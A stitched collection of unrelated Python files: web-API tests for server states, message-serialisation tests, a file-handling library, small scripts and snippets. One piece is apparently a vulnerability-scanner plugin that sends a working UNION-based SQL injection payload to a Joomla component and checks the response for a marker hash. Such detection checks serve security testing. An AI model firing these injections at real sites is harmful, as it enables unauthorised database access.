{"artifact_id":2, "artifact_uuid":"testserver2", "artifact_name":"testserver2"}]
)
#And after changing states around
self.create_server("testserver3")
app.post('/servers/testserver3/Stopping')
app.post('/servers/testserver2/Starting')
app.post('/servers/testserver3/Starting')
app.post('/servers/testserver2/Stopping')
res2 = app.get('/states/Stopping')
self.assertEqual(res2.json,
[{"artifact_id":1, "artifact_uuid":"testserver1", "artifact_name":"testserver1"},
{"artifact_id":2, "artifact_uuid":"testserver2", "artifact_name":"testserver2"}]
)
def test_retrieve_job_progress(self):
""" Not currently implemented. """
def test_retrieve_server_touches(self):
""" Not currently implemented. """
def test_retrieve_state_summary(self):
""" Test for /states
"""
app = self.app
# Generate base status table
status_table = { s : 0 for s in server.get_state_list() }
r = app.get("/states")
self.assertEqual(r.json, status_table)
for n in range(1, 6):
self.create_server("testserver%i" % n)
app.post('/servers/testserver1/Stopping')
app.post('/servers/testserver2/Stopping')
app.post('/servers/testserver3/Stopping')
app.post('/servers/testserver4/Started')
app.post('/servers/testserver5/Starting')
# Test1 - servers set to only one state.
st1 = status_table.copy()
st1['Stopping'] = 3
st1['Started'] = 1
st1['Starting'] = 1
r = app.get("/states")
self.assertEqual(r.json, st1)
# Test2 - server states have been changed
app.post('/servers/testserver3/Started')
app.post('/servers/testserver3/Stopping')
app.post('/servers/testserver4/Stopping')
app.post('/servers/testserver3/Starting')
st2 = status_table.copy()
st2['Stopping'] = 3
st2['Started'] = 0
st2['Starting'] = 2
r = app.get("/states")
self.assertEqual(r.json, st2)
###############################################################################
# Support Functions, calling server admin views #
###############################################################################
def create_user(self, name):
response = self.app.put('/users/' + name,
{'type': 'users',
'handle': name + '@example.com',
'name': name + " " + name,
'username': name},
status=200,
expect_errors=False)
def create_server(self, name):
return self.app.put('/servers/' + name,
{'hostname': name, 'uuid': name },
status=200,
expect_errors=False).json
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'pyphrb'
def assign(service, arg):
if service == "joomla":
return True, arg
def audit(arg):
url = arg
_, head, body, _, _ = curl.curl(url + '/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,0x3a,md5(3.1415),0x3a),3,4,5,6,7,8,9')
if body and body.find('63e1f04640e83605c1d177544a5a0488') != -1:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('joomla', 'http://www.example.com/')[1])
|
import logging
from unittest import mock
from .common import generate_msg
from pypeman.message import Message
from pypeman.test import TearDownProjectTestCase as TestCase
class MessageTests(TestCase):
def test_message_dict_conversion(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
mdict = m.to_dict()
        self.assertTrue(isinstance(mdict, dict), "Message to_dict method is broken")
compare_to = Message.from_dict(mdict)
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well decoded")
self.assertEqual(m.uuid, compare_to.uuid, "Bad uuid")
self.assertEqual(m.meta['question'], compare_to.meta['question'], "Bad meta")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx")
self.assertEqual(
m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_json_conversion(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
msg_json = m.to_json()
compare_to = Message.from_json(msg_json)
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well decoded")
self.assertEqual(m.uuid, compare_to.uuid, "Bad uuid")
self.assertEqual(m.meta['question'], compare_to.meta['question'], "Bad meta")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx")
self.assertEqual(
m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_copy(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
compare_to = m.copy()
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well copied")
self.assertEqual(m.uuid, compare_to.uuid, "Bad uuid copy")
self.assertEqual(m.meta['question'], compare_to.meta['question'], "Bad meta copy")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx copy")
self.assertEqual(
m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_renew(self):
m = generate_msg(message_content={'answer': 42}, with_context=True)
compare_to = m.renew()
self.assertEqual(m.payload['answer'], compare_to.payload['answer'], "Payload not well copied")
self.assertNotEqual(m.uuid, compare_to.uuid, "Uuid should not be copied")
self.assertNotEqual(m.timestamp, compare_to.timestamp, "Timestamp should not be copied")
self.assertEqual(m.meta['question'],
compare_to.meta['question'], "Bad meta copy")
self.assertEqual(
m.ctx['test']['payload']['question'],
compare_to.ctx['test']['payload']['question'], "Bad ctx copy")
self.assertEqual(m.ctx['test']['meta']['answer'],
compare_to.ctx['test']['meta']['answer'], "Bad ctx")
def test_message_logging(self):
"""
        Check that message logging works as expected.
"""
m = generate_msg(message_content={'answer': 42}, with_context=True)
mock_logger = mock.MagicMock()
m.log(logger=mock_logger)
mock_logger.log.assert_called_with(logging.DEBUG, 'Meta: %r', {'question': 'unknown'})
        mock_logger.reset_mock()
m.log(logger=mock_logger, payload=True, meta=True, context=True, log_level=logging.INFO)
mock_logger.log.assert_called_with(logging.INFO, 'Meta: %r', {'answer': 43})
def test_message_print(self):
"""
        Check that the printable message version works as expected.
"""
m = generate_msg(
message_content={'answer': 42},
with_context=True,
timestamp=(2010, 10, 10, 10, 10, 10),
)
m.uuid = "msguuid"
result = m.to_print(context=True)
reference = """Message msguuid
Date: 2010-10-10 10:10:10
Payload: {'answer': 42}
Meta: {'question': 'unknown'}
Context for message ->
-- Key "test" --
Payload: {'question': 'known'}
Meta: {'answer': 43}
"""
self.assertEqual(result, reference, "Print message not working")
|
# Factory test suite
from silhouette.factory import *
def test_render_file_paths():
src_paths = ["/home/ubuntu/project/$name$/$module$/readme.md", "/home/ubuntu/project/$name$/$module$/jenkinsfile"]
vars = {"name": "flask", "module": "example"}
result = render_file_paths(src_paths, vars)
assert('/home/ubuntu/project/flask/example/readme.md' in result)
assert('/home/ubuntu/project/flask/example/jenkinsfile' in result)
|
from unittest import TestCase
from scripts.helpers import hash_password
class TestExample(TestCase):
def test_mytest(self):
self.assertTrue(True)
|
"""
python file object library
"""
# imports python
import json
import imp
import cPickle
# imports local
from . import _generic
# PYTHON FILE OBJECTS #
class JsonFile(_generic.File):
"""file object that manipulate a ``.json`` file on the file system
"""
# ATTRIBUTES #
_extension = 'json'
# OBJECT COMMANDS #
@classmethod
def create(cls, path, content=None, **__):
"""create a json file
:param path: path of the json file
:type path: str
:param content: content of the json file
:type content: any
:return: the created json file
:rtype: :class:`cgp_generic_utils.files.JsonFile`
"""
# errors
if not _generic.Path(path).extension() == cls._extension:
raise ValueError('{0} is not a JsonFile path'.format(path))
# get content
content = content or {}
# execute
with open(path, 'w') as toWrite:
json.dump(content, toWrite, indent=4)
# return
return cls(path)
# COMMANDS #
def read(self):
"""read the json file
:return: the content of the json file
:rtype: any
"""
        # read content from the json file
with open(self.path(), 'r') as toRead:
data = json.load(toRead)
# return
return data
class PklFile(_generic.File):
"""file object that manipulate a ``.pkl`` file on the file system
"""
# ATTRIBUTES #
_extension = 'pkl'
# OBJECT COMMANDS #
@classmethod
def create(cls, path, content=None, **__):
"""create a pkl file
:param path: path of the pkl file
:type path: str
:param content: content of the pkl file
:type content: any
:return: the created pkl file
:rtype: :class:`cgp_generic_utils.files.PklFile`
"""
# errors
if not _generic.Path(path).extension() == cls._extension:
raise ValueError('{0} is not a PklFile path'.format(path))
# get content
content = content or {}
# execute
with open(path, 'wb') as toWrite:
cPickle.dump(content, toWrite)
# return
return cls(path)
# COMMANDS #
def read(self):
"""read the pkl file
:return: the content of the pkl file
:rtype: any
"""
        # read content from the pkl file
with open(self.path(), 'rb') as toRead:
data = cPickle.load(toRead)
# return
return data
class PyFile(_generic.File):
"""file object that manipulates a ``.py`` file on the file system
"""
# ATTRIBUTES #
_extension = 'py'
# COMMANDS #
def importAsModule(self):
"""import the python file as module
:return: the module object
:rtype: python
"""
# import as module
module = imp.load_source(self.baseName(withExtension=False), self.path())
# return
return module
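# Illustrative usage sketch (an assumption, not part of the original module): it presumes the
# module is importable as cgp_generic_utils.files per the docstrings above, and uses Python 2
# because of the cPickle/imp imports.
if __name__ == '__main__':
    demo_json = JsonFile.create('/tmp/demo_settings.json', content={'fps': 24})
    print(demo_json.read())  # -> {u'fps': 24}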
|
def main():
from pyperclip import copy as cpy
import pyautogui
from time import sleep
def gg():
sleep(3)
cpy('!p gooba earrape')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
cpy('-p gooba earrape')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
cpy('!loop')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
cpy('-loop')
pyautogui.hotkey('ctrl', 'v')
pyautogui.press('enter')
gg()
if __name__ == '__main__':
main()
|
def alphabet_war(fight):
    pass  # function body missing in the source file
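# A minimal sketch of one plausible completion, assuming this stub targets the classic
# "Alphabet war" kata (left letters w/p/b/s score 4/3/2/1, right letters m/q/d/z score
# 4/3/2/1); the function below is illustrative and not from the original file.
def alphabet_war_sketch(fight):
    left = {'w': 4, 'p': 3, 'b': 2, 's': 1}
    right = {'m': 4, 'q': 3, 'd': 2, 'z': 1}
    left_score = sum(left.get(c, 0) for c in fight)
    right_score = sum(right.get(c, 0) for c in fight)
    if left_score > right_score:
        return "Left side wins!"
    if right_score > left_score:
        return "Right side wins!"
    return "Let's fight again!"

# Example: alphabet_war_sketch("zdqmwpbs") returns "Let's fight again!" (both sides score 10).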
|
import hy
import main
def run():
parts = {"head": "O", "torso": "|", "l_arm": "-", "r_arm": "-", "l_leg": "/", "r_leg": "\\"}
print(main.game_loop({"lives": 6, "word": "hangman".lower(), "guess": [], "body": {}, "parts": parts, "letters": []}))
if __name__ == '__main__':
run()
while input('Replay? Y/N: ').lower() == 'y':
run()
|
# Import numpy as np
import numpy as np
# Calculate the portfolio standard deviation
portfolio_volatility = np.sqrt(np.dot(portfolio_weights.T, np.dot(cov_mat_annual, portfolio_weights)))
print(portfolio_volatility)
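# Minimal self-contained sketch (illustrative, not from the original snippet): the snippet above
# assumes portfolio_weights and cov_mat_annual exist upstream, so the demo below builds comparable
# inputs and applies the same formula sigma_p = sqrt(w.T @ Sigma @ w).
rng = np.random.default_rng(0)
demo_daily_returns = rng.normal(0.0005, 0.01, size=(252, 4))      # fake daily returns for 4 assets
demo_cov_annual = np.cov(demo_daily_returns, rowvar=False) * 252  # annualised covariance matrix
demo_weights = np.array([0.25, 0.25, 0.25, 0.25])                 # equal weights summing to 1
demo_volatility = np.sqrt(demo_weights @ demo_cov_annual @ demo_weights)
print(demo_volatility)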
|